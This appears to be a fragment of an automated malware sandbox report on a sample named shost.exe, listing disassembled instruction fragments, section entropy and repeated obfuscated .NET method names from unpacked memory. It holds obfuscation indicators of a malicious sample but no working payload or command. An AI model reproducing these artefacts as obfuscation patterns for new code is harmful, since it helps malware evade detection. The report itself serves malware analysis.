Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D177C9 push ecx; retf 0046h	11_2_07D177EA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D1BAF1 push eax; iretd	11_2_07D1BB46
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D19994 pushad ; retf	11_2_07D199ED
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D34BFB push edi; ret	11_2_07D34DF6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3D7E3 pushad ; iretd	11_2_07D3D811
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D34E04 push eax; ret	11_2_07D34E35
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D34E38 push eax; ret	11_2_07D34E35
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D374AD push ds; retf 0040h	11_2_07D374FE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D38C1B push 0000003Bh; ret	11_2_07D38C1F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE0B41 push es; retf	11_2_0ACE0BE2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE3B22 push FFFFFF92h; iretd	11_2_0ACE3B24
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE30DE push cs; retf	11_2_0ACE30F2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE30F3 push cs; retf	11_2_0ACE30F2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE3C68 push ss; retf	11_2_0ACE3C6A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_02D92C5C push 04B8074Ah; retf	26_2_02D92CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_073D219E push 6BCF4AE4h; iretd	26_2_073D21E9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 29_2_04A3636B push eax; ret	29_2_04A36371
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 29_2_04A32CF9 push 04B807A2h; retf	29_2_04A32CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 29_2_04A30DB0 push edi; ret	29_2_04A30DD2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 31_2_0476629D push eax; ret	31_2_04766351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 31_2_04760EC3 push ebx; iretd	31_2_04760ECA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_04CA27F9 push eax; retf 006Ah	33_2_04CA27FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_04CA2CF9 push 04B807BFh; retf	33_2_04CA2CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_04CA180A push ss; retf	33_2_04CA180B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_04CA3A9D push ebx; retf	33_2_04CA3ADA

Source: shost.exe.2.dr

Static PE information: section name: .text entropy: 7.069578560210795

Source: 11.2.shost.exe.477b518.3.raw.unpack, q3DRJkDM1M5omu3Tac.cs	High entropy of concatenated method names: '_4GprCdNAxi9wnSzZhwMXkej62HfV1NQNP7Eu2LnJqCVOk4HyMxs2q', '_0lV76QAVhAlT3LrzgVu4HADX5ElflvQ9qjXenHmUgnUlUzkK0lfme', 'RFJaI9HoTIKdUE9QwPMfThThSWmDxLdjc9cFUPzLc9bRuHjlT5oCY', '_3c8RBpaKEfJtJtX373gqDkCnH8iXerkM8hpUZHJxgWnubXFqEXQgk'
Source: 11.2.shost.exe.477b518.3.raw.unpack, Entu2TFCnp7YQ0fhEWmRxn0qoxfTK0xh7VtQ.cs	High entropy of concatenated method names: 'rA0A7liN5f1IAVE3ESuz3h8F8xgTRMxzYYM9', 'sotg1ICknSwEthPDBgt841ZbI8g7FlGf3Aom', '_7VFldC1Vicpg1T0GGcUFJ7tiAQE2waIbymen', 'M5GEuFkFshgSH', 'M2KYgtUhFJBai', 'aI53pHbjJZJjp', '_1MVulUQE3Xj1O', 'lYkuGpO4RZX8W', 'jvdNKiv7wKPPF', 'pHt2lfjlwW1Ld'
Source: 11.2.shost.exe.477b518.3.raw.unpack, JNxYyDPFGXMwDs7opz.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'Du1mBMfuCr9JVUVNRwoUVfccozTkMEi4vQvgOdbKuB0sHZ4KkQg0l', 'z02oBCi4mbJItotZqRWaM7Hg4cnhv616ooaUiJe2o7w5HXnnN6yW1', 'KqxbtOBWQSXnZIoMIjMXhb1iWgRbRnLhnQcIqYEhEshncQOqctw6A', 'qP7LvJJ5qipfYFLYvvF1vnLs14d76wGCIc72Z2ozAFTdWQBaiug7U'
Source: 11.2.shost.exe.477b518.3.raw.unpack, LwscecAuA6uaYpJtiRqydj7d3vVUnDIe7MwdzljUF2ZSVPohck3.cs	High entropy of concatenated method names: 'QPalHBU2B7Hso9kAGAwSqcf5ZdCToMZXI5FThkubuv3BEpv6xab', 'nQVQL5zvgX08caQaSiAi2WvZfiMA', 'ivw9Q6GoAkOki0jiFKKma9zI2smP', 'n0B22gvDYGuWUdhdwxlRTwMrIIAj', 'U3PFo3uEyJvRNxuQdMUHbCmAJH14'
Source: 11.2.shost.exe.477b518.3.raw.unpack, j4mKenyvTNNUaoVwEp.cs	High entropy of concatenated method names: 'CdcBkgrLX3QLcmmRZC', 'P3RvJG6WE51kmbOs32', 'iphTrMJPm24RLtPk4A', 'KDavIFrsoBlNTH9hKB', 'oUAs85zBGMtnzBzW5T', 'smhcQCUQxDFQ8r20qn', 'ClUTZdbgixYyqWDwQpVkR4S8YnQqRMXhOvu1yB9v1dUApUPc2FcpJ', 'I4yrePHihxRz6KKTRprO8VBKqXVCHPfWgH3zGtXFRcVWyzrZ2HJxw', 'OCI2PRd34GHJwhvrmozckLz65eokzFbpuyF7D29yAme295r6YXOlf', 'xZdW0O3SHYwIdRfygnDwhHNDpyiD0hjNFWoRDSlFGLXfVlM6iJGvk'
Source: 11.2.shost.exe.477b518.3.raw.unpack, 1KdJpVKYNWXjVKuSp1.cs	High entropy of concatenated method names: '_301DxXLIqB6Kn1247w', 'a6mX2ffp3eUzT12tvz', 't1iGtkoBKgZVSjqqbi', 'JSthv5RyhS5n7CMaFp', 't2judaKOPeTJSioBZI', 'aS2VlCJq2lMGOEiuP2', 'FwkFdtKhglDsP4W7y6', 'zYbZ95nYj3JVluddYp', '_5aVDxB8FEGezbQ0wb7', 'RHzXCWYGnaBmI2pjsu'
Source: 11.2.shost.exe.477b518.3.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	High entropy of concatenated method names: 'R8yeJ94Ijcid7osG8ADOoMnNUyPyVlpZ0tOZCRlsNF4GNXDsSab', 'rWdXMj4gSyVJuyZUVbNH1YC1pPDg6fSnottWFY6z1ttxBRJsyuB', 'AIFtFFoZ80lv0xkZhkh5z5RmMyN2OdehAH4NrNvNL1xQRkDkOFc', '_2uUJ6xOuGqemW1c34hKAUzyprE3VajYlP0oas4N3KtdQoLhUHAL', 'YcVGnezdTXbCjpwuldNstWxch485h36lnAeFaAbhr6ccmMxqhtZ', 'PMNvOuGeDw5a6xc2wQSWD6xAOP4pTPBPSJonHkTRAt5aZxHkrgn', '_5Y8CZEY5cAPjaksVnaQJd7bDGOxvdChABeohEIJnni21NJRQK0A', 'Ngif65ZkYv1rU9fF19DFGr7BbNPaf5C2u9QJmmCLlBEWAODtHid', 'vLWrdqSDjiQNwsZ1QQoqyqIDWy5ZTVJH73hrZRcjNWg3hce8cro', 'LpB7NKzyGTdYrVHDaFy9O8UR0SDr2FXiSS6BOvRDRfLaviUS2ir'
Source: 11.2.shost.exe.477b518.3.raw.unpack, qW1bSeqWgYkWpDiaOHefZ36Dz2H97nNHpy5txIE3CMuywm3p8NG.cs	High entropy of concatenated method names: 'W2JeRHbwf9GkgqkvMtpiUVSUY62mBIqXWC2vRa2M11DlD1xQ8v3', 'NF6YK9WGfWivk1XcWZI4QGGohRf4PCq4QTc0Es0Dr46g3PEZzp1', 'aXrdsGt4OKJseHXPqPAaM0dlwryQmRlZ1P0pfk5OG3g0Rhrf01A', '_7TZ7uFkjpg3NOgUipQK4rLqJVD6Ez8xpBwG09jviBagc0zSFyaq', 'bEcNMtgpn4FMVcLfB6ivBGEy3pjOz94bQN0uxu3DiS2xXijY99B', 'TSsS8QODIBf1yeNboSgkZ8QNh7nNviP8qReRjxX6XzsN63Kk8eN', '_8K3U3ATc4GXUZqtzTLuyq8GiIDknmebCfwgLgLu06CSkb9ory51', 'PcwMrOBUx1EpGOeyDeaH22EqVA9gSTSsExrIKscy3UqLjXX78PG', 'NWoQS66BW7fUB5xqUFPIi6MYjHQIPZ009Rex', 'eYwtM0SUrtPb7yYJK5NhTwDDPfA9MybYu1SE'
Source: 11.2.shost.exe.477b518.3.raw.unpack, DltdNNIpUjdX0vnRBtcnLVxL5HJRX7ZATkdt.cs	High entropy of concatenated method names: 'jtniHGRcIqy4cbxcB4MiT43g1tT6KlWOVc0I', 'pfJKokQLYXZpqjILwTAxoHO6Q5KWsVQ2un59', 'dbEsepGjkMBAZ8DraYuX2czrF1vv3GyLW5SE', 'cLxwHSsCPBDyNiynoW8bxAs7Vk8VNYQdVkya', 'uuCYBeQMixyT3h3j4UUvItd5i9O1', 'b7xDUl2IeFfmR3FfL963Whx35aXs', 'JHmEGwi3SjhCJCCqUHBpjm3ietTp', 'XyrmBwyusAD4chqRVI6xvfNok6sl', 'LtSBH9zO4IcApnn6pFGPnuBukEc6', 'IWDrC2W7HnNrRrGlyJiJO9zFLX7G'
Source: 11.2.shost.exe.477b518.3.raw.unpack, 7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.cs	High entropy of concatenated method names: 'A3EHC9sXbAqaAT4ksvRJDEhZoPVt0iIYXrGh', 'HkUkr2zlbjbrRkhZCWZHiB8rFTTaICemXSW7', 'C8FuHigg9uKJupwSLOvvyOJGTMwYYkgikgcQ', 'AlrKPXJEJCgYwajPc4wg5YSph0q2gt4dcPFu', 'aJc6M8kGNZq0zOZy2uB6XSzX9Tmb4hv5hsNe', 'iXT3UQBRnBPWQuIOkvsHvqc8ZZD759lWLafO', 'RlFQkiUrxenM8JFopntwrvAibdtPXYWw9IFA', 'iw7vcYegDQz1nIfIA4zog2DgIvOb45SwszNe', '_7UCsiSGVxE9vM8BJALK7EHw9VQEr81htLJDg', 'YVYs2ZbYi4XNzLhpZzvVWRgXnv9DWR9SHY0W'
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, q3DRJkDM1M5omu3Tac.cs	High entropy of concatenated method names: '_4GprCdNAxi9wnSzZhwMXkej62HfV1NQNP7Eu2LnJqCVOk4HyMxs2q', '_0lV76QAVhAlT3LrzgVu4HADX5ElflvQ9qjXenHmUgnUlUzkK0lfme', 'RFJaI9HoTIKdUE9QwPMfThThSWmDxLdjc9cFUPzLc9bRuHjlT5oCY', '_3c8RBpaKEfJtJtX373gqDkCnH8iXerkM8hpUZHJxgWnubXFqEXQgk'
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, Entu2TFCnp7YQ0fhEWmRxn0qoxfTK0xh7VtQ.cs	High entropy of concatenated method names: 'rA0A7liN5f1IAVE3ESuz3h8F8xgTRMxzYYM9', 'sotg1ICknSwEthPDBgt841ZbI8g7FlGf3Aom', '_7VFldC1Vicpg1T0GGcUFJ7tiAQE2waIbymen', 'M5GEuFkFshgSH', 'M2KYgtUhFJBai', 'aI53pHbjJZJjp', '_1MVulUQE3Xj1O', 'lYkuGpO4RZX8W', 'jvdNKiv7wKPPF', 'pHt2lfjlwW1Ld'
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, JNxYyDPFGXMwDs7opz.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'Du1mBMfuCr9JVUVNRwoUVfccozTkMEi4vQvgOdbKuB0sHZ4KkQg0l', 'z02oBCi4mbJItotZqRWaM7Hg4cnhv616ooaUiJe2o7w5HXnnN6yW1', 'KqxbtOBWQSXnZIoMIjMXhb1iWgRbRnLhnQcIqYEhEshncQOqctw6A', 'qP7LvJJ5qipfYFLYvvF1vnLs14d76wGCIc72Z2ozAFTdWQBaiug7U'
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, LwscecAuA6uaYpJtiRqydj7d3vVUnDIe7MwdzljUF2ZSVPohck3.cs	High entropy of concatenated method names: 'QPalHBU2B7Hso9kAGAwSqcf5ZdCToMZXI5FThkubuv3BEpv6xab', 'nQVQL5zvgX08caQaSiAi2WvZfiMA', 'ivw9Q6GoAkOki0jiFKKma9zI2smP', 'n0B22gvDYGuWUdhdwxlRTwMrIIAj', 'U3PFo3uEyJvRNxuQdMUHbCmAJH14'
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, j4mKenyvTNNUaoVwEp.cs	High entropy of concatenated method names: 'CdcBkgrLX3QLcmmRZC', 'P3RvJG6WE51kmbOs32', 'iphTrMJPm24RLtPk4A', 'KDavIFrsoBlNTH9hKB', 'oUAs85zBGMtnzBzW5T', 'smhcQCUQxDFQ8r20qn', 'ClUTZdbgixYyqWDwQpVkR4S8YnQqRMXhOvu1yB9v1dUApUPc2FcpJ', 'I4yrePHihxRz6KKTRprO8VBKqXVCHPfWgH3zGtXFRcVWyzrZ2HJxw', 'OCI2PRd34GHJwhvrmozckLz65eokzFbpuyF7D29yAme295r6YXOlf', 'xZdW0O3SHYwIdRfygnDwhHNDpyiD0hjNFWoRDSlFGLXfVlM6iJGvk'
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, 1KdJpVKYNWXjVKuSp1.cs	High entropy of concatenated method names: '_301DxXLIqB6Kn1247w', 'a6mX2ffp3eUzT12tvz', 't1iGtkoBKgZVSjqqbi', 'JSthv5RyhS5n7CMaFp', 't2judaKOPeTJSioBZI', 'aS2VlCJq2lMGOEiuP2', 'FwkFdtKhglDsP4W7y6', 'zYbZ95nYj3JVluddYp', '_5aVDxB8FEGezbQ0wb7', 'RHzXCWYGnaBmI2pjsu'
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	High entropy of concatenated method names: 'R8yeJ94Ijcid7osG8ADOoMnNUyPyVlpZ0tOZCRlsNF4GNXDsSab', 'rWdXMj4gSyVJuyZUVbNH1YC1pPDg6fSnottWFY6z1ttxBRJsyuB', 'AIFtFFoZ80lv0xkZhkh5z5RmMyN2OdehAH4NrNvNL1xQRkDkOFc', '_2uUJ6xOuGqemW1c34hKAUzyprE3VajYlP0oas4N3KtdQoLhUHAL', 'YcVGnezdTXbCjpwuldNstWxch485h36lnAeFaAbhr6ccmMxqhtZ', 'PMNvOuGeDw5a6xc2wQSWD6xAOP4pTPBPSJonHkTRAt5aZxHkrgn', '_5Y8CZEY5cAPjaksVnaQJd7bDGOxvdChABeohEIJnni21NJRQK0A', 'Ngif65ZkYv1rU9fF19DFGr7BbNPaf5C2u9QJmmCLlBEWAODtHid', 'vLWrdqSDjiQNwsZ1QQoqyqIDWy5ZTVJH73hrZRcjNWg3hce8cro', 'LpB7NKzyGTdYrVHDaFy9O8UR0SDr2FXiSS6BOvRDRfLaviUS2ir'
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, qW1bSeqWgYkWpDiaOHefZ36Dz2H97nNHpy5txIE3CMuywm3p8NG.cs	High entropy of concatenated method names: 'W2JeRHbwf9GkgqkvMtpiUVSUY62mBIqXWC2vRa2M11DlD1xQ8v3', 'NF6YK9WGfWivk1XcWZI4QGGohRf4PCq4QTc0Es0Dr46g3PEZzp1', 'aXrdsGt4OKJseHXPqPAaM0dlwryQmRlZ1P0pfk5OG3g0Rhrf01A', '_7TZ7uFkjpg3NOgUipQK4rLqJVD6Ez8xpBwG09jviBagc0zSFyaq', 'bEcNMtgpn4FMVcLfB6ivBGEy3pjOz94bQN0uxu3DiS2xXijY99B', 'TSsS8QODIBf1yeNboSgkZ8QNh7nNviP8qReRjxX6XzsN63Kk8eN', '_8K3U3ATc4GXUZqtzTLuyq8GiIDknmebCfwgLgLu06CSkb9ory51', 'PcwMrOBUx1EpGOeyDeaH22EqVA9gSTSsExrIKscy3UqLjXX78PG', 'NWoQS66BW7fUB5xqUFPIi6MYjHQIPZ009Rex', 'eYwtM0SUrtPb7yYJK5NhTwDDPfA9MybYu1SE'
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, DltdNNIpUjdX0vnRBtcnLVxL5HJRX7ZATkdt.cs	High entropy of concatenated method names: 'jtniHGRcIqy4cbxcB4MiT43g1tT6KlWOVc0I', 'pfJKokQLYXZpqjILwTAxoHO6Q5KWsVQ2un59', 'dbEsepGjkMBAZ8DraYuX2czrF1vv3GyLW5SE', 'cLxwHSsCPBDyNiynoW8bxAs7Vk8VNYQdVkya', 'uuCYBeQMixyT3h3j4UUvItd5i9O1', 'b7xDUl2IeFfmR3FfL963Whx35aXs', 'JHmEGwi3SjhCJCCqUHBpjm3ietTp', 'XyrmBwyusAD4chqRVI6xvfNok6sl', 'LtSBH9zO4IcApnn6pFGPnuBukEc6', 'IWDrC2W7HnNrRrGlyJiJO9zFLX7G'
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, 7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.cs	High entropy of concatenated method names: 'A3EHC9sXbAqaAT4ksvRJDEhZoPVt0iIYXrGh', 'HkUkr2zlbjbrRkhZCWZHiB8rFTTaICemXSW7', 'C8FuHigg9uKJupwSLOvvyOJGTMwYYkgikgcQ', 'AlrKPXJEJCgYwajPc4wg5YSph0q2gt4dcPFu', 'aJc6M8kGNZq0zOZy2uB6XSzX9Tmb4hv5hsNe', 'iXT3UQBRnBPWQuIOkvsHvqc8ZZD759lWLafO', 'RlFQkiUrxenM8JFopntwrvAibdtPXYWw9IFA', 'iw7vcYegDQz1nIfIA4zog2DgIvOb45SwszNe', '_7UCsiSGVxE9vM8BJALK7EHw9VQEr81htLJDg', 'YVYs2ZbYi4XNzLhpZzvVWRgXnv9DWR9SHY0W'
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, q3DRJkDM1M5omu3Tac.cs	High entropy of concatenated method names: '_4GprCdNAxi9wnSzZhwMXkej62HfV1NQNP7Eu2LnJqCVOk4HyMxs2q', '_0lV76QAVhAlT3LrzgVu4HADX5ElflvQ9qjXenHmUgnUlUzkK0lfme', 'RFJaI9HoTIKdUE9QwPMfThThSWmDxLdjc9cFUPzLc9bRuHjlT5oCY', '_3c8RBpaKEfJtJtX373gqDkCnH8iXerkM8hpUZHJxgWnubXFqEXQgk'
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, Entu2TFCnp7YQ0fhEWmRxn0qoxfTK0xh7VtQ.cs	High entropy of concatenated method names: 'rA0A7liN5f1IAVE3ESuz3h8F8xgTRMxzYYM9', 'sotg1ICknSwEthPDBgt841ZbI8g7FlGf3Aom', '_7VFldC1Vicpg1T0GGcUFJ7tiAQE2waIbymen', 'M5GEuFkFshgSH', 'M2KYgtUhFJBai', 'aI53pHbjJZJjp', '_1MVulUQE3Xj1O', 'lYkuGpO4RZX8W', 'jvdNKiv7wKPPF', 'pHt2lfjlwW1Ld'
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, JNxYyDPFGXMwDs7opz.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'Du1mBMfuCr9JVUVNRwoUVfccozTkMEi4vQvgOdbKuB0sHZ4KkQg0l', 'z02oBCi4mbJItotZqRWaM7Hg4cnhv616ooaUiJe2o7w5HXnnN6yW1', 'KqxbtOBWQSXnZIoMIjMXhb1iWgRbRnLhnQcIqYEhEshncQOqctw6A', 'qP7LvJJ5qipfYFLYvvF1vnLs14d76wGCIc72Z2ozAFTdWQBaiug7U'
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, LwscecAuA6uaYpJtiRqydj7d3vVUnDIe7MwdzljUF2ZSVPohck3.cs	High entropy of concatenated method names: 'QPalHBU2B7Hso9kAGAwSqcf5ZdCToMZXI5FThkubuv3BEpv6xab', 'nQVQL5zvgX08caQaSiAi2WvZfiMA', 'ivw9Q6GoAkOki0jiFKKma9zI2smP', 'n0B22gvDYGuWUdhdwxlRTwMrIIAj', 'U3PFo3uEyJvRNxuQdMUHbCmAJH14'
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, j4mKenyvTNNUaoVwEp.cs	High entropy of concatenated method names: 'CdcBkgrLX3QLcmmRZC', 'P3RvJG6WE51kmbOs32', 'iphTrMJPm24RLtPk4A', 'KDavIFrsoBlNTH9hKB', 'oUAs85zBGMtnzBzW5T', 'smhcQCUQxDFQ8r20qn', 'ClUTZdbgixYyqWDwQpVkR4S8YnQqRMXhOvu1yB9v1dUApUPc2FcpJ', 'I4yrePHihxRz6KKTRprO8VBKqXVCHPfWgH3zGtXFRcVWyzrZ2HJxw', 'OCI2PRd34GHJwhvrmozckLz65eokzFbpuyF7D29yAme295r6YXOlf', 'xZdW0O3SHYwIdRfygnDwhHNDpyiD0hjNFWoRDSlFGLXfVlM6iJGvk'
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, 1KdJpVKYNWXjVKuSp1.cs	High entropy of concatenated method names: '_301DxXLIqB6Kn1247w', 'a6mX2ffp3eUzT12tvz', 't1iGtkoBKgZVSjqqbi', 'JSthv5RyhS5n7CMaFp', 't2judaKOPeTJSioBZI', 'aS2VlCJq2lMGOEiuP2', 'FwkFdtKhglDsP4W7y6', 'zYbZ95nYj3JVluddYp', '_5aVDxB8FEGezbQ0wb7', 'RHzXCWYGnaBmI2pjsu'
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	High entropy of concatenated method names: 'R8yeJ94Ijcid7osG8ADOoMnNUyPyVlpZ0tOZCRlsNF4GNXDsSab', 'rWdXMj4gSyVJuyZUVbNH1YC1pPDg6fSnottWFY6z1ttxBRJsyuB', 'AIFtFFoZ80lv0xkZhkh5z5RmMyN2OdehAH4NrNvNL1xQRkDkOFc', '_2uUJ6xOuGqemW1c34hKAUzyprE3VajYlP0oas4N3KtdQoLhUHAL', 'YcVGnezdTXbCjpwuldNstWxch485h36lnAeFaAbhr6ccmMxqhtZ', 'PMNvOuGeDw5a6xc2wQSWD6xAOP4pTPBPSJonHkTRAt5aZxHkrgn', '_5Y8CZEY5cAPjaksVnaQJd7bDGOxvdChABeohEIJnni21NJRQK0A', 'Ngif65ZkYv1rU9fF19DFGr7BbNPaf5C2u9QJmmCLlBEWAODtHid', 'vLWrdqSDjiQNwsZ1QQoqyqIDWy5ZTVJH73hrZRcjNWg3hce8cro', 'LpB7NKzyGTdYrVHDaFy9O8UR0SDr2FXiSS6BOvRDRfLaviUS2ir'
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, qW1bSeqWgYkWpDiaOHefZ36Dz2H97nNHpy5txIE3CMuywm3p8NG.cs	High entropy of concatenated method names: 'W2JeRHbwf9GkgqkvMtpiUVSUY62mBIqXWC2vRa2M11DlD1xQ8v3', 'NF6YK9WGfWivk1XcWZI4QGGohRf4PCq4QTc0Es0Dr46g3PEZzp1', 'aXrdsGt4OKJseHXPqPAaM0dlwryQmRlZ1P0pfk5OG3g0Rhrf01A', '_7TZ7uFkjpg3NOgUipQK4rLqJVD6Ez8xpBwG09jviBagc0zSFyaq', 'bEcNMtgpn4FMVcLfB6ivBGEy3pjOz94bQN0uxu3DiS2xXijY99B', 'TSsS8QODIBf1yeNboSgkZ8QNh7nNviP8qReRjxX6XzsN63Kk8eN', '_8K3U3ATc4GXUZqtzTLuyq8GiIDknmebCfwgLgLu06CSkb9ory51', 'PcwMrOBUx1EpGOeyDeaH22EqVA9gSTSsExrIKscy3UqLjXX78PG', 'NWoQS66BW7fUB5xqUFPIi6MYjHQIPZ009Rex', 'eYwtM0SUrtPb7yYJK5NhTwDDPfA9MybYu1SE'
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, DltdNNIpUjdX0vnRBtcnLVxL5HJRX7ZATkdt.cs	High entropy of concatenated method names: 'jtniHGRcIqy4cbxcB4MiT43g1tT6KlWOVc0I', 'pfJKokQLYXZpqjILwTAxoHO6Q5KWsVQ2un59', 'dbEsepGjkMBAZ8DraYuX2czrF1vv3GyLW5SE', 'cLxwHSsCPBDyNiynoW8bxAs7Vk8VNYQdVkya', 'uuCYBeQMixyT3h3j4UUvItd5i9O1', 'b7xDUl2IeFfmR3FfL963Whx35aXs', 'JHmEGwi3SjhCJCCqUHBpjm3ietTp', 'XyrmBwyusAD4chqRVI6xvfNok6sl', 'LtSBH9zO4IcApnn6pFGPnuBukEc6', 'IWDrC2W7HnNrRrGlyJiJO9zFLX7G'
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, 7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.cs	High entropy of concatenated method names: 'A3EHC9sXbAqaAT4ksvRJDEhZoPVt0iIYXrGh', 'HkUkr2zlbjbrRkhZCWZHiB8rFTTaICemXSW7', 'C8FuHigg9uKJupwSLOvvyOJGTMwYYkgikgcQ', 'AlrKPXJEJCgYwajPc4wg5YSph0q2gt4dcPFu', 'aJc6M8kGNZq0zOZy2uB6XSzX9Tmb4hv5hsNe', 'iXT3UQBRnBPWQuIOkvsHvqc8ZZD759lWLafO', 'RlFQkiUrxenM8JFopntwrvAibdtPXYWw9IFA', 'iw7vcYegDQz1nIfIA4zog2DgIvOb45SwszNe', '_7UCsiSGVxE9vM8BJALK7EHw9VQEr81htLJDg', 'YVYs2ZbYi4XNzLhpZzvVWRgXnv9DWR9SHY0W'
Source: 11.2.shost.exe.475185a.4.raw.unpack, q3DRJkDM1M5omu3Tac.cs	High entropy of concatenated method names: '_4GprCdNAxi9wnSzZhwMXkej62HfV1NQNP7Eu2LnJqCVOk4HyMxs2q', '_0lV76QAVhAlT3LrzgVu4HADX5ElflvQ9qjXenHmUgnUlUzkK0lfme', 'RFJaI9HoTIKdUE9QwPMfThThSWmDxLdjc9cFUPzLc9bRuHjlT5oCY', '_3c8RBpaKEfJtJtX373gqDkCnH8iXerkM8hpUZHJxgWnubXFqEXQgk'
Source: 11.2.shost.exe.475185a.4.raw.unpack, Entu2TFCnp7YQ0fhEWmRxn0qoxfTK0xh7VtQ.cs	High entropy of concatenated method names: 'rA0A7liN5f1IAVE3ESuz3h8F8xgTRMxzYYM9', 'sotg1ICknSwEthPDBgt841ZbI8g7FlGf3Aom', '_7VFldC1Vicpg1T0GGcUFJ7tiAQE2waIbymen', 'M5GEuFkFshgSH', 'M2KYgtUhFJBai', 'aI53pHbjJZJjp', '_1MVulUQE3Xj1O', 'lYkuGpO4RZX8W', 'jvdNKiv7wKPPF', 'pHt2lfjlwW1Ld'
Source: 11.2.shost.exe.475185a.4.raw.unpack, JNxYyDPFGXMwDs7opz.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'Du1mBMfuCr9JVUVNRwoUVfccozTkMEi4vQvgOdbKuB0sHZ4KkQg0l', 'z02oBCi4mbJItotZqRWaM7Hg4cnhv616ooaUiJe2o7w5HXnnN6yW1', 'KqxbtOBWQSXnZIoMIjMXhb1iWgRbRnLhnQcIqYEhEshncQOqctw6A', 'qP7LvJJ5qipfYFLYvvF1vnLs14d76wGCIc72Z2ozAFTdWQBaiug7U'
Source: 11.2.shost.exe.475185a.4.raw.unpack, LwscecAuA6uaYpJtiRqydj7d3vVUnDIe7MwdzljUF2ZSVPohck3.cs	High entropy of concatenated method names: 'QPalHBU2B7Hso9kAGAwSqcf5ZdCToMZXI5FThkubuv3BEpv6xab', 'nQVQL5zvgX08caQaSiAi2WvZfiMA', 'ivw9Q6GoAkOki0jiFKKma9zI2smP', 'n0B22gvDYGuWUdhdwxlRTwMrIIAj', 'U3PFo3uEyJvRNxuQdMUHbCmAJH14'
Source: 11.2.shost.exe.475185a.4.raw.unpack, j4mKenyvTNNUaoVwEp.cs	High entropy of concatenated method names: 'CdcBkgrLX3QLcmmRZC', 'P3RvJG6WE51kmbOs32', 'iphTrMJPm24RLtPk4A', 'KDavIFrsoBlNTH9hKB', 'oUAs85zBGMtnzBzW5T', 'smhcQCUQxDFQ8r20qn', 'ClUTZdbgixYyqWDwQpVkR4S8YnQqRMXhOvu1yB9v1dUApUPc2FcpJ', 'I4yrePHihxRz6KKTRprO8VBKqXVCHPfWgH3zGtXFRcVWyzrZ2HJxw', 'OCI2PRd34GHJwhvrmozckLz65eokzFbpuyF7D29yAme295r6YXOlf', 'xZdW0O3SHYwIdRfygnDwhHNDpyiD0hjNFWoRDSlFGLXfVlM6iJGvk'
